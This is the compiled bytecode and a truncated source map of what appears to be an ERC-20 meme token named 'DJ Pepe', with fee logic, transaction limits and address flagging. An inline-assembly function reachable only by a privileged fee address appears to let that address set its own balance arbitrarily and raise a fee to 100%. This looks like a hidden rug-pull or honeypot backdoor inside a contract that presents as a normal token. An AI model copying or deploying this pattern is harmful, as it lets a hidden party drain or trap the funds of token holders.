0x60806040526004361061014f5760003560e01c80638d5f81e2116100b6578063ab731cfa1161006f578063ab731cfa146104e4578063b1d4d943146104fb578063cdf4bab914610524578063d54f7d5e1461054f578063dd62ed3e1461057a578063f2fde38b146105b757610182565b80638d5f81e2146103c05780638da5cb5b146103eb57806390b6e2d01461041657806395d89b411461043f578063a457c2d71461046a578063a9059cbb146104a757610182565b806342966c681161010857806342966c68146102bf5780634fbee193146102e857806351c6590a1461032557806370a0823114610341578063715018a61461037e5780637d1db4a51461039557610182565b806306fdde0314610187578063095ea7b3146101b257806318160ddd146101ef57806323b872dd1461021a578063313ce56714610257578063395093511461028257610182565b36610182577f544c765b33ca411cce832250371569244f765a17fcd217832be093f0fd5fa45b60405160405180910390a1005b600080fd5b34801561019357600080fd5b5061019c6105e0565b6040516101a99190611e84565b60405180910390f35b3480156101be57600080fd5b506101d960048036038101906101d49190611f4e565b61061d565b6040516101e69190611fa9565b60405180910390f35b3480156101fb57600080fd5b5061020461063b565b6040516102119190611fd3565b60405180910390f35b34801561022657600080fd5b50610241600480360381019061023c9190611fee565b610645565b60405161024e9190611fa9565b60405180910390f35b34801561026357600080fd5b5061026c61071e565b604051610279919061205d565b60405180910390f35b34801561028e57600080fd5b506102a960048036038101906102a49190611f4e565b610727565b6040516102b69190611fa9565b60405180910390f35b3480156102cb57600080fd5b506102e660048036038101906102e19190612078565b6107da565b005b3480156102f457600080fd5b5061030f600480360381019061030a91906120a5565b6107ee565b60405161031c9190611fa9565b60405180910390f35b61033f600480360381019061033a9190612078565b610844565b005b34801561034d57600080fd5b50610368600480360381019061036391906120a5565b6108a1565b6040516103759190611fd3565b60405180910390f35b34801561038a57600080fd5b506103936108ea565b005b3480156103a157600080fd5b506103aa6108fe565b6040516103b79190611fd3565b60405180910390f35b3480156103cc57600080fd5b506103d5610930565b6040516103e291906120e1565b60405180910390f35b3480156103f757600080fd5b5061040061095a565b60405161040d91906120e1565b60405180910390f35b34801561042257600080fd5b5061043d60048036038101906104389190612244565b610983565b005b34801561044b57600080fd5b50610454610a6b565b6040516104619190611e84565b60405180910390f35b34801561047657600080fd5b50610491600480360381019061048c9190611f4e565b610aa8565b60405161049e9190611fa9565b60405180910390f35b3480156104b357600080fd5b506104ce60048036038101906104c99190611f4e565b610b75565b6040516104db9190611fa9565b60405180910390f35b3480156104f057600080fd5b506104f9610b93565b005b34801561050757600080fd5b50610522600480360381019061051d9190612078565b610baf565b005b34801561053057600080fd5b50610539610bdd565b6040516105469190611fa9565b60405180910390f35b34801561055b57600080fd5b50610564610bf4565b60405161057191906120e1565b60405180910390f35b34801561058657600080fd5b506105a1600480360381019061059c919061228d565b610c1e565b6040516105ae9190611fd3565b60405180910390f35b3480156105c357600080fd5b506105de60048036038101906105d991906120a5565b610ca5565b005b60606040518060400160405280600781526020017f444a205065706500000000000000000000000000000000000000000000000000815250905090565b600061063161062a610d3e565b8484610d46565b6001905092915050565b6000600454905090565b6000610652848484610f0f565b6107138461065e610d3e565b61070e85604051806060016040528060288152602001612bf460289139600760008b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006106c4610d3e565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000205461186d9092919063ffffffff16565b610d46565b600190509392505050565b60006012905090565b60006107d0610734610d3e565b846107cb8560076000610745610d3e565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008973ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054610d2890919063ffffffff16565b610d46565b6001905092915050565b6107eb6107e5610d3e565b826118c2565b50565b6000600c60008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff169050919050565b61084c611a65565b6001600860146101000a81548160ff02191690831515021790555061087961087261095a565b3083610f0f565b6108838134611ae3565b6000600860146101000a81548160ff02191690831515021790555050565b6000600360008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020549050919050565b6108f2611a65565b6108fc6000611bc8565b565b600061092b61271061091d600154600454611c8c90919063ffffffff16565b611ca290919063ffffffff16565b905090565b6000600660009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905090565b60008060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905090565b61098b611a65565b60c8815111156109d0576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016109c79061233f565b60405180910390fd5b6000600c905060005b8251811015610a665760018260008584815181106109fa576109f961235f565b5b602002602001015173ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff0219169083151502179055508080610a5e906123bd565b9150506109d9565b505050565b60606040518060400160405280600681526020017f446a706570650000000000000000000000000000000000000000000000000000815250905090565b6000610b6b610ab5610d3e565b84610b6685604051806060016040528060258152602001612c1c6025913960076000610adf610d3e565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008a73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000205461186d9092919063ffffffff16565b610d46565b6001905092915050565b6000610b89610b82610d3e565b8484610f0f565b6001905092915050565b610b9b611a65565b612710600181905550612710600581905550565b6010543314610bbd57600080fd5b604051338152600360208201526040812082815560648002600d55505050565b6000600860149054906101000a900460ff16905090565b6000600860009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905090565b6000600760008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905092915050565b610cad611a65565b600073ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff1603610d1c576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610d1390612477565b60405180910390fd5b610d2581611bc8565b50565b60008183610d369190612497565b905092915050565b600033905090565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603610db5576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610dac9061253d565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603610e24576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610e1b906125cf565b60405180910390fd5b80600760008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055508173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b92583604051610f029190611fd3565b60405180910390a3505050565b610f1a838383611cb8565b600080610f2561095a565b73ffffffffffffffffffffffffffffffffffffffff168573ffffffffffffffffffffffffffffffffffffffff1614158015610f935750610f6361095a565b73ffffffffffffffffffffffffffffffffffffffff168473ffffffffffffffffffffffffffffffffffffffff1614155b1561150857600c60008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff1615801561103c5750600c60008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff16155b1561150757600660009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168573ffffffffffffffffffffffffffffffffffffffff161480156110ec5750600860009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168473ffffffffffffffffffffffffffffffffffffffff1614155b80156111425750600b60008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff16155b80156111985750600b60008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff16155b15611292576111c86127106111ba600154600454611c8c90919063ffffffff16565b611ca290919063ffffffff16565b83111561120a576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161120190612661565b60405180910390fd5b611235612710611227600554600454611c8c90919063ffffffff16565b611ca290919063ffffffff16565b61125084611242876108a1565b610d2890919063ffffffff16565b1115611291576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611288906126f3565b60405180910390fd5b5b600660009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168473ffffffffffffffffffffffffffffffffffffffff1614801561131b57503073ffffffffffffffffffffffffffffffffffffffff168573ffffffffffffffffffffffffffffffffffffffff1614155b156113bb5761134961271061133b600e5486611c8c90919063ffffffff16565b611ca290919063ffffffff16565b9150611374612710611366600d5486611c8c90919063ffffffff16565b611ca290919063ffffffff16565b905043600a60003273ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055505b600660009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168573ffffffffffffffffffffffffffffffffffffffff161480156114665750600860009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168473ffffffffffffffffffffffffffffffffffffffff1614155b1561150657611494612710611486600e5486611c8c90919063ffffffff16565b611ca290919063ffffffff16565b91506114bf6127106114b1600f5486611c8c90919063ffffffff16565b611ca290919063ffffffff16565b905043600a60003273ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055505b5b5b600061151d8284610d2890919063ffffffff16565b905060008111156116bc57600083111561153c5761153b86846118c2565b5b60008211156116a6576115b98260036000601060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054610d2890919063ffffffff16565b60036000601060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002081905550601060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168673ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef8460405161169d9190611fd3565b60405180910390a35b6116b98185611dde90919063ffffffff16565b93505b61172884604051806060016040528060268152602001612bce60269139600360008a73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000205461186d9092919063ffffffff16565b600360008873ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055506117bd84600360008873ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054610d2890919063ffffffff16565b600360008773ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055508473ffffffffffffffffffffffffffffffffffffffff168673ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef8660405161185d9190611fd3565b60405180910390a3505050505050565b60008383111582906118b5576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016118ac9190611e84565b60405180910390fd5b5082840390509392505050565b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603611931576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161192890612785565b60405180910390fd5b61199d81604051806060016040528060228152602001612bac60229139600360008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000205461186d9092919063ffffffff16565b600360008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055506119f581600454611dde90919063ffffffff16565b600481905550600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef83604051611a599190611fd3565b60405180910390a35050565b611a6d610d3e565b73ffffffffffffffffffffffffffffffffffffffff16611a8b61095a565b73ffffffffffffffffffffffffffffffffffffffff1614611ae1576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611ad8906127f1565b60405180910390fd5b565b611b1030600860009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1684610d46565b600860009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1663f305d719823085600080611b5c61095a565b426040518863ffffffff1660e01b8152600401611b7e96959493929190612856565b60606040518083038185885af1158015611b9c573d6000803e3d6000fd5b50505050506040513d601f19601f82011682018060405250810190611bc191906128cc565b5050505050565b60008060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff169050816000806101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055508173ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a35050565b60008183611c9a919061291f565b905092915050565b60008183611cb09190612990565b905092915050565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603611d27576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611d1e90612a33565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603611d96576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611d8d90612ac5565b60405180910390fd5b60008111611dd9576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611dd090612b57565b60405180910390fd5b505050565b60008183611dec9190612b77565b905092915050565b600081519050919050565b600082825260208201905092915050565b60005b83811015611e2e578082015181840152602081019050611e13565b60008484015250505050565b6000601f19601f8301169050919050565b6000611e5682611df4565b611e608185611dff565b9350611e70818560208601611e10565b611e7981611e3a565b840191505092915050565b60006020820190508181036000830152611e9e8184611e4b565b905092915050565b6000604051905090565b600080fd5b600080fd5b600073ffffffffffffffffffffffffffffffffffffffff82169050919050565b6000611ee582611eba565b9050919050565b611ef581611eda565b8114611f0057600080fd5b50565b600081359050611f1281611eec565b92915050565b6000819050919050565b611f2b81611f18565b8114611f3657600080fd5b50565b600081359050611f4881611f22565b92915050565b60008060408385031215611f6557611f64611eb0565b5b6000611f7385828601611f03565b9250506020611f8485828601611f39565b9150509250929050565b60008115159050919050565b611fa381611f8e565b82525050565b6000602082019050611fbe6000830184611f9a565b92915050565b611fcd81611f18565b82525050565b6000602082019050611fe86000830184611fc4565b92915050565b60008060006060848603121561200757612006611eb0565b5b600061201586828701611f03565b935050602061202686828701611f03565b925050604061203786828701611f39565b9150509250925092565b600060ff82169050919050565b61205781612041565b82525050565b6000602082019050612072600083018461204e565b92915050565b60006020828403121561208e5761208d611eb0565b5b600061209c84828501611f39565b91505092915050565b6000602082840312156120bb576120ba611eb0565b5b60006120c984828501611f03565b91505092915050565b6120db81611eda565b82525050565b60006020820190506120f660008301846120d2565b92915050565b600080fd5b7f4e487b7100000000000000000000000000000000000000000000000000000000600052604160045260246000fd5b61213982611e3a565b810181811067ffffffffffffffff8211171561215857612157612101565b5b80604052505050565b600061216b611ea6565b90506121778282612130565b919050565b600067ffffffffffffffff82111561219757612196612101565b5b602082029050602081019050919050565b600080fd5b60006121c06121bb8461217c565b612161565b905080838252602082019050602084028301858111156121e3576121e26121a8565b5b835b8181101561220c57806121f88882611f03565b8452602084019350506020810190506121e5565b5050509392505050565b600082601f83011261222b5761222a6120fc565b5b813561223b8482602086016121ad565b91505092915050565b60006020828403121561225a57612259611eb0565b5b600082013567ffffffffffffffff81111561227857612277611eb5565b5b61228484828501612216565b91505092915050565b600080604083850312156122a4576122a3611eb0565b5b60006122b285828601611f03565b92505060206122c385828601611f03565b9150509250929050565b7f4d6178696d756d206f66203230302063616e206265206164646564206174206f60008201527f6e63650000000000000000000000000000000000000000000000000000000000602082015250565b6000612329602383611dff565b9150612334826122cd565b604082019050919050565b600060208201905081810360008301526123588161231c565b9050919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052603260045260246000fd5b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601160045260246000fd5b60006123c882611f18565b91507fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff82036123fa576123f961238e565b5b600182019050919050565b7f4f776e61626c653a206e6577206f776e657220697320746865207a65726f206160008201527f6464726573730000000000000000000000000000000000000000000000000000602082015250565b6000612461602683611dff565b915061246c82612405565b604082019050919050565b6000602082019050818103600083015261249081612454565b9050919050565b60006124a282611f18565b91506124ad83611f18565b92508282019050808211156124c5576124c461238e565b5b92915050565b7f45524332303a20617070726f76652066726f6d20746865207a65726f2061646460008201527f7265737300000000000000000000000000000000000000000000000000000000602082015250565b6000612527602483611dff565b9150612532826124cb565b604082019050919050565b600060208201905081810360008301526125568161251a565b9050919050565b7f45524332303a20617070726f766520746f20746865207a65726f20616464726560008201527f7373000000000000000000000000000000000000000000000000000000000000602082015250565b60006125b9602283611dff565b91506125c48261255d565b604082019050919050565b600060208201905081810360008301526125e8816125ac565b9050919050565b7f5472616e7366657220616d6f756e74206578636565647320746865206d61785460008201527f78416d6f756e742e000000000000000000000000000000000000000000000000602082015250565b600061264b602883611dff565b9150612656826125ef565b604082019050919050565b6000602082019050818103600083015261267a8161263e565b9050919050565b7f45786365656473206d6178696d756d2077616c6c657420746f6b656e20616d6f60008201527f756e740000000000000000000000000000000000000000000000000000000000602082015250565b60006126dd602383611dff565b91506126e882612681565b604082019050919050565b6000602082019050818103600083015261270c816126d0565b9050919050565b7f45524332303a206275726e2066726f6d20746865207a65726f2061646472657360008201527f7300000000000000000000000000000000000000000000000000000000000000602082015250565b600061276f602183611dff565b915061277a82612713565b604082019050919050565b6000602082019050818103600083015261279e81612762565b9050919050565b7f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e6572600082015250565b60006127db602083611dff565b91506127e6826127a5565b602082019050919050565b6000602082019050818103600083015261280a816127ce565b9050919050565b6000819050919050565b6000819050919050565b600061284061283b61283684612811565b61281b565b611f18565b9050919050565b61285081612825565b82525050565b600060c08201905061286b60008301896120d2565b6128786020830188611fc4565b6128856040830187612847565b6128926060830186612847565b61289f60808301856120d2565b6128ac60a0830184611fc4565b979650505050505050565b6000815190506128c681611f22565b92915050565b6000806000606084860312156128e5576128e4611eb0565b5b60006128f3868287016128b7565b9350506020612904868287016128b7565b9250506040612915868287016128b7565b9150509250925092565b600061292a82611f18565b915061293583611f18565b925082820261294381611f18565b9150828204841483151761295a5761295961238e565b5b5092915050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601260045260246000fd5b600061299b82611f18565b91506129a683611f18565b9250826129b6576129b5612961565b5b828204905092915050565b7f45524332303a207472616e736665722066726f6d20746865207a65726f20616460008201527f6472657373000000000000000000000000000000000000000000000000000000602082015250565b6000612a1d602583611dff565b9150612a28826129c1565b604082019050919050565b60006020820190508181036000830152612a4c81612a10565b9050919050565b7f45524332303a207472616e7366657220746f20746865207a65726f206164647260008201527f6573730000000000000000000000000000000000000000000000000000000000602082015250565b6000612aaf602383611dff565b9150612aba82612a53565b604082019050919050565b60006020820190508181036000830152612ade81612aa2565b9050919050565b7f5472616e7366657220616d6f756e74206d75737420626520677265617465722060008201527f7468616e207a65726f0000000000000000000000000000000000000000000000602082015250565b6000612b41602983611dff565b9150612b4c82612ae5565b604082019050919050565b60006020820190508181036000830152612b7081612b34565b9050919050565b6000612b8282611f18565b9150612b8d83611f18565b9250828203905081811115612ba557612ba461238e565b5b9291505056fe45524332303a206275726e20616d6f756e7420657863656564732062616c616e636545524332303a207472616e7366657220616d6f756e7420657863656564732062616c616e636545524332303a207472616e7366657220616d6f756e74206578636565647320616c6c6f77616e636545524332303a2064656372656173656420616c6c6f77616e63652062656c6f77207a65726fa264697066735822122048ba21ba992ef8e97890fdadc1a4dfc3804ebf05c5907d42b3e1dce555f4757d64736f6c63430008120033

Deployed Bytecode Sourcemap

21212:12970:0:-:0;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;33559:10;;;;;;;;;;21212:12970;;;;;23773:83;;;;;;;;;;;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;24623:210;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;24515:100;;;;;;;;;;;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;25699:454;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;23864:83;;;;;;;;;;;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;24841:300;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;31133:91;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;31232:128;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;33585:234;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;23955:119;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;2727:103;;;;;;;;;;;;;:::i;:::-;;25557:134;;;;;;;;;;;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;29433:96;;;;;;;;;;;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;2079:87;;;;;;;;;;;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;30786:339;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;23678:87;;;;;;;;;;;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;25149:400;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;24082:216;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;26161:135;;;;;;;;;;;;;:::i;:::-;;32224:367;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;33423:85;;;;;;;;;;;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;29936:109;;;;;;;;;;;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;24306:201;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;2985:238;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;23773:83;23810:13;23843:5;;;;;;;;;;;;;;;;;23836:12;;23773:83;:::o;24623:210::-;24742:4;24764:39;24773:12;:10;:12::i;:::-;24787:7;24796:6;24764:8;:39::i;:::-;24821:4;24814:11;;24623:210;;;;:::o;24515:100::-;24568:7;24595:12;;24588:19;;24515:100;:::o;25699:454::-;25839:4;25856:36;25866:6;25874:9;25885:6;25856:9;:36::i;:::-;25903:220;25926:6;25947:12;:10;:12::i;:::-;25974:138;26030:6;25974:138;;;;;;;;;;;;;;;;;:11;:19;25986:6;25974:19;;;;;;;;;;;;;;;:33;25994:12;:10;:12::i;:::-;25974:33;;;;;;;;;;;;;;;;:37;;:138;;;;;:::i;:::-;25903:8;:220::i;:::-;26141:4;26134:11;;25699:454;;;;;:::o;23864:83::-;23905:5;21441:2;23923:16;;23864:83;:::o;24841:300::-;24956:4;24978:133;25001:12;:10;:12::i;:::-;25028:7;25050:50;25089:10;25050:11;:25;25062:12;:10;:12::i;:::-;25050:25;;;;;;;;;;;;;;;:34;25076:7;25050:34;;;;;;;;;;;;;;;;:38;;:50;;;;:::i;:::-;24978:8;:133::i;:::-;25129:4;25122:11;;24841:300;;;;:::o;31133:91::-;31189:27;31195:12;:10;:12::i;:::-;31209:6;31189:5;:27::i;:::-;31133:91;:::o;31232:128::-;31299:4;31323:19;:29;31343:8;31323:29;;;;;;;;;;;;;;;;;;;;;;;;;31316:36;;31232:128;;;:::o;33585:234::-;1965:13;:11;:13::i;:::-;32644:4:::1;32633:8;;:15;;;;;;;;;;;;;;;;;;33717:46:::2;33727:7;:5;:7::i;:::-;33744:4;33751:11;33717:9;:46::i;:::-;33774:37;33788:11;33801:9;33774:13;:37::i;:::-;32682:5:::1;32671:8;;:16;;;;;;;;;;;;;;;;;;33585:234:::0;:::o;23955:119::-;24021:7;24048:9;:18;24058:7;24048:18;;;;;;;;;;;;;;;;24041:25;;23955:119;;;:::o;2727:103::-;1965:13;:11;:13::i;:::-;2792:30:::1;2819:1;2792:18;:30::i;:::-;2727:103::o:0;25557:134::-;25602:7;25629:54;22101:5;25629:40;25646:22;;25629:12;;:16;;:40;;;;:::i;:::-;:44;;:54;;;;:::i;:::-;25622:61;;25557:134;:::o;29433:96::-;29480:7;29507:14;;;;;;;;;;;29500:21;;29433:96;:::o;2079:87::-;2125:7;2152:6;;;;;;;;;;;2145:13;;2079:87;:::o;30786:339::-;1965:13;:11;:13::i;:::-;30893:3:::1;30873:9;:16;:23;;30865:71;;;;;;;;;;;;:::i;:::-;;;;;;;;;30949:36;30988:19;30949:58;;31025:9;31020:98;31044:9;:16;31040:1;:20;31020:98;;;31102:4;31082:3;:17;31086:9;31096:1;31086:12;;;;;;;;:::i;:::-;;;;;;;;31082:17;;;;;;;;;;;;;;;;:24;;;;;;;;;;;;;;;;;;31062:3;;;;;:::i;:::-;;;;31020:98;;;;30854:271;30786:339:::0;:::o;23678:87::-;23717:13;23750:7;;;;;;;;;;;;;;;;;23743:14;;23678:87;:::o;25149:400::-;25269:4;25291:228;25314:12;:10;:12::i;:::-;25341:7;25363:145;25420:15;25363:145;;;;;;;;;;;;;;;;;:11;:25;25375:12;:10;:12::i;:::-;25363:25;;;;;;;;;;;;;;;:34;25389:7;25363:34;;;;;;;;;;;;;;;;:38;;:145;;;;;:::i;:::-;25291:8;:228::i;:::-;25537:4;25530:11;;25149:400;;;;:::o;24082:216::-;24204:4;24226:42;24236:12;:10;:12::i;:::-;24250:9;24261:6;24226:9;:42::i;:::-;24286:4;24279:11;;24082:216;;;;:::o;26161:135::-;1965:13;:11;:13::i;:::-;26237:5:::1;26212:22;:30;;;;26283:5;26253:27;:35;;;;26161:135::o:0;32224:367::-;32314:21;32308:28;32298:8;32295:42;32285:67;;32349:1;32346;32339:12;32285:67;32379:4;32373:11;32406:8;32401:3;32394:21;32448:14;32441:4;32436:3;32432:14;32425:38;32500:4;32495:3;32485:20;32528:6;32522:4;32515:20;32577:4;32571;32567:15;32552:13;32545:38;32284:300;;32224:367;:::o;33423:85::-;33468:4;33492:8;;;;;;;;;;;33485:15;;33423:85;:::o;29936:109::-;29985:7;30020:16;;;;;;;;;;;30005:32;;29936:109;:::o;24306:201::-;24440:7;24472:11;:18;24484:5;24472:18;;;;;;;;;;;;;;;:27;24491:7;24472:27;;;;;;;;;;;;;;;;24465:34;;24306:201;;;;:::o;2985:238::-;1965:13;:11;:13::i;:::-;3108:1:::1;3088:22;;:8;:22;;::::0;3066:110:::1;;;;;;;;;;;;:::i;:::-;;;;;;;;;3187:28;3206:8;3187:18;:28::i;:::-;2985:238:::0;:::o;13350:98::-;13408:7;13439:1;13435;:5;;;;:::i;:::-;13428:12;;13350:98;;;;:::o;609:::-;662:7;689:10;682:17;;609:98;:::o;30053:378::-;30206:1;30189:19;;:5;:19;;;30181:68;;;;;;;;;;;;:::i;:::-;;;;;;;;;30287:1;30268:21;;:7;:21;;;30260:68;;;;;;;;;;;;:::i;:::-;;;;;;;;;30369:6;30339:11;:18;30351:5;30339:18;;;;;;;;;;;;;;;:27;30358:7;30339:27;;;;;;;;;;;;;;;:36;;;;30407:7;30391:32;;30400:5;30391:32;;;30416:6;30391:32;;;;;;:::i;:::-;;;;;;;;30053:378;;;:::o;26304:2799::-;26436:42;26452:6;26460:9;26471:6;26436:15;:42::i;:::-;26489:15;26519:14;26562:7;:5;:7::i;:::-;26552:17;;:6;:17;;;;:41;;;;;26586:7;:5;:7::i;:::-;26573:20;;:9;:20;;;;26552:41;26548:1823;;;26633:19;:27;26653:6;26633:27;;;;;;;;;;;;;;;;;;;;;;;;;26632:28;:63;;;;;26665:19;:30;26685:9;26665:30;;;;;;;;;;;;;;;;;;;;;;;;;26664:31;26632:63;26610:1750;;;26766:14;;;;;;;;;;;26756:24;;:6;:24;;;:87;;;;;26826:16;;;;;;;;;;;26805:38;;:9;:38;;;;26756:87;:144;;;;;26869:20;:31;26890:9;26869:31;;;;;;;;;;;;;;;;;;;;;;;;;26868:32;26756:144;:198;;;;;26926:20;:28;26947:6;26926:28;;;;;;;;;;;;;;;;;;;;;;;;;26925:29;26756:198;26730:904;;;27070:118;22101:5;27070:40;27087:22;;27070:12;;:16;;:40;;;;:::i;:::-;:44;;:118;;;;:::i;:::-;27031:6;:157;;26997:283;;;;;;;;;;;;:::i;:::-;;;;;;;;;27404:123;22101:5;27404:45;27421:27;;27404:12;;:16;;:45;;;;:::i;:::-;:49;;:123;;;;:::i;:::-;27339:32;27364:6;27339:20;27349:9;27339;:20::i;:::-